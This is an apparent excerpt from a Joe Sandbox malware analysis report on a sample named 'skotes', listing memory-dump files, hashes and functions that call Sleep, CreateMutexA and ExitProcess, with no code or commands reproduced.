Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 90592d356364292cbe89383f4e3a119323be4f24da744275a2c42bac3cd47756
Instruction ID: 70be7628a74360d59cb7bec7f96c08b2f8d18eb46481479d9e32de1807ac61aa
Opcode Fuzzy Hash: 90592d356364292cbe89383f4e3a119323be4f24da744275a2c42bac3cd47756
Instruction Fuzzy Hash: 30E08C3005124CAECF257B18C819ECE3BAAEB62749F800844FC5886222CB35FEC1C681

Function 00AE9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 48f161fb6f9a1ae69a4851d16f8d8c499d455deba5d671dc848a9284d1ed126e
Instruction ID: 7c26ba1ad9a3d9ac113f6de8f210d2689b822c4600ab86f498f9de508b44a2cf
Opcode Fuzzy Hash: 48f161fb6f9a1ae69a4851d16f8d8c499d455deba5d671dc848a9284d1ed126e
Instruction Fuzzy Hash: 57317B317003848BEB08EB7DDD8576EBBA2EBD2310F348618E014D73D6C7B569848752

Function 00AE9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5e9c0b23cab325a03a088ef91822da7060b6f2dfafb35f35e7b664dd5e5996db
Instruction ID: 02309dfaa01f6ffda2f3ee26793639726c6c1b856918a0c49520306b8734f3db
Opcode Fuzzy Hash: 5e9c0b23cab325a03a088ef91822da7060b6f2dfafb35f35e7b664dd5e5996db
Instruction Fuzzy Hash: 05316B317002848BEB18EB7EDD847ADB7A2EB96310F24861CF014DB3D6D775A9848752

Function 00AEA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 66c508be49713a87fbeabff1f80ab3d08f12a89d1146246a988eecdf2f1ccd9d
Instruction ID: 93983d325ef9566bab478c92491f3325b877083b60b53a65c58262655fd86342
Opcode Fuzzy Hash: 66c508be49713a87fbeabff1f80ab3d08f12a89d1146246a988eecdf2f1ccd9d
Instruction Fuzzy Hash: CD3148317102849BEB08ABBDCD8576DB7A2DBA2314F248718E014DB3D5C7B6B9848653

Function 00AEA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
